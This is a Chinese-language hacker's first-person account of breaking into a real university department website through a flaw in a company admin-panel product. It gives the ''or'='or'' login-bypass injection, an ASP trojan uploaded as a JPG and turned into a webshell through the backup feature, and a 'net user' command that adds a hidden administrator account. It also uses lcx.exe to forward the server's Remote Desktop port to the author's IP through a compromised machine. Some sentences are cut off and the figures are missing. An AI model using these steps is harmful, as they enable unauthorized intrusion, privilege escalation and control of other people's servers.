绕过证书验证的一次入侵

一天，在源码站下载了一套《易天工作室通用企业型后台管理系统》源代码来读。check.asp页面中发现了一个问题，由于程序没有对输入内容进行过滤，我们可以输入万能密码登陆，直接进入后台。（难道这个就是传说的中企业后台漏洞？）

发现了这套程序的漏洞，那我们当然要利用此漏洞来拿服务器咯。Google hacking 了一下，来到了郑州大学某院系的页面。直接在URL后面加上admin，后台一下就跳出来了。让我们看看漏洞是否存在吧。在用户名和密码处都填 ’or’=’or’ ，然后把验证码写好，点登陆，果然进入了管理页面，说明漏洞真的存在哦。因为这套程序本身就有备份的功能，所以得到WEBSHELL就很简单了。

先把我们的ASP木马改成JPG格式上传，如图1在空间图片管理的最后1页或2页就可以看到我们的图片木马了。如图2然后右键，属性就可以得到上传的路径了。之后，在数据库备份里把我们的图片木马还原成ASP格式就可以了。（在备份的时候，如果路径填写错误会提示网页无法显示，如果出现这样的情况，可以检查下图片的路径是否填写正确。此套程序中也有ewebeditor，如果后台中备份的功能被删除了，可以试试用这个来拿webshell，因为很多管理员都忘记更改它的默认密码或数据库路径）。

登入我们备份出的木马，看了下服务器的信息，wscript.shell 组建没有删除，如图 3 64126。图 4试着连接下，不成功，可能有防火墙或者是内网的原因。服务器开了21，43958端口，看来是装有serv-u，那就用木马中自带的这个提权脚本试下看。Net user cool$ love /add & net localgroup administrators cool$ /add 执行后看了下系统用户-用户帐号这项，果然多了个cool$用户，图5

终端端口被改成了

居然这样提权便成功了。好久没遇到这样的好事了。

终端连接不上难不倒我，上传了个LCX.EXE在服务器上用wscript.shell执行E:\www4root\work\mpa\admin \lcx.exe -slave 121.20.172.126 51 127.0.0.1 64126 图6 64126端口转到121.20.172.126 （自己机器公网IP）的51端口。之后再在本机执行lcx.exe –listen 51 5000 意思是把51端口上的数据转发的5000端口，连接本机的5000端口就相当于连接服务器的64126端口了。如果没有特殊情况就可以看到终端登陆的窗口了。可是令我感到意外的是，本机上监听的端口时，出现了错误。提示是read fd1 data error,maybe close? 图 7 LCX把端口转出来就不会出错，为什么把端口改了之后就会出现这样的错误呢？或者不是由更改端口导致，而是别的地方的问题？

意思是把服务器上的

每次刚刚和服务器建立连接后，马上就出现数据读取错误，就是连接不上。奇怪了，以前在渗透别的站时，服务器没有更改默认端口，用

到百度上查了下，发现很多人在问这样的问题，而回答的不是说防火墙的问题，就是一些其他没什么用处的信息。自己分析了下，这个应该不是防火墙的原因导致的，以前也遇到过有防火墙而连接不上终端的，但是用LCX转一下就可以了的。后来到写论坛上去问，结果也没找到究竟问题出在哪里。

第二天，突然想到是不是由于自己所处的网段问题，导致连接不成功。于是变把服务器的终端端口转到到另一台WIN2003的肉鸡上。当在肉鸡上连接本机的 5000端口时，突然出现了这个提示，图8远程计算机要求身份验证才能连接，这个是在自己机器上没有出现过的。到百度上查了下，在一个角落发现了一篇 WIN2003远程桌面SSL认证配置的文章，大概内容是因为远程桌面一直被认为比较不安全的，如果加上SSL证书认证，可以提高安全性。可以通过 WIN2003安装盘来安装证书服务。之后连接终端的时候就要有证书验证。

读了那篇文章之后和刚才连接时候出现的提示，我们可以知道引起数据读取错误的并不是因为防火墙的问题，最可能的是证书认证的问题。后来进一步查了下资料，说如果安装了证书服务，要求有证书才能连接时，可以在远程桌面的安全选项卡中选择试图身份验证，才可以。

按照这样的说法，把WIN3002肉鸡远程桌面的安全选项卡中选择试图身份验证，图9XP中没有这个选项卡）然后再次连接本机的5000端口，弹出了这个提示如图10 这里点是，如果提示不行就点查看证书，在重新填加个证书就可以了，这次终于没有了讨厌的 read fd1 data error,maybe close? 错误提示了，成功连接。如图11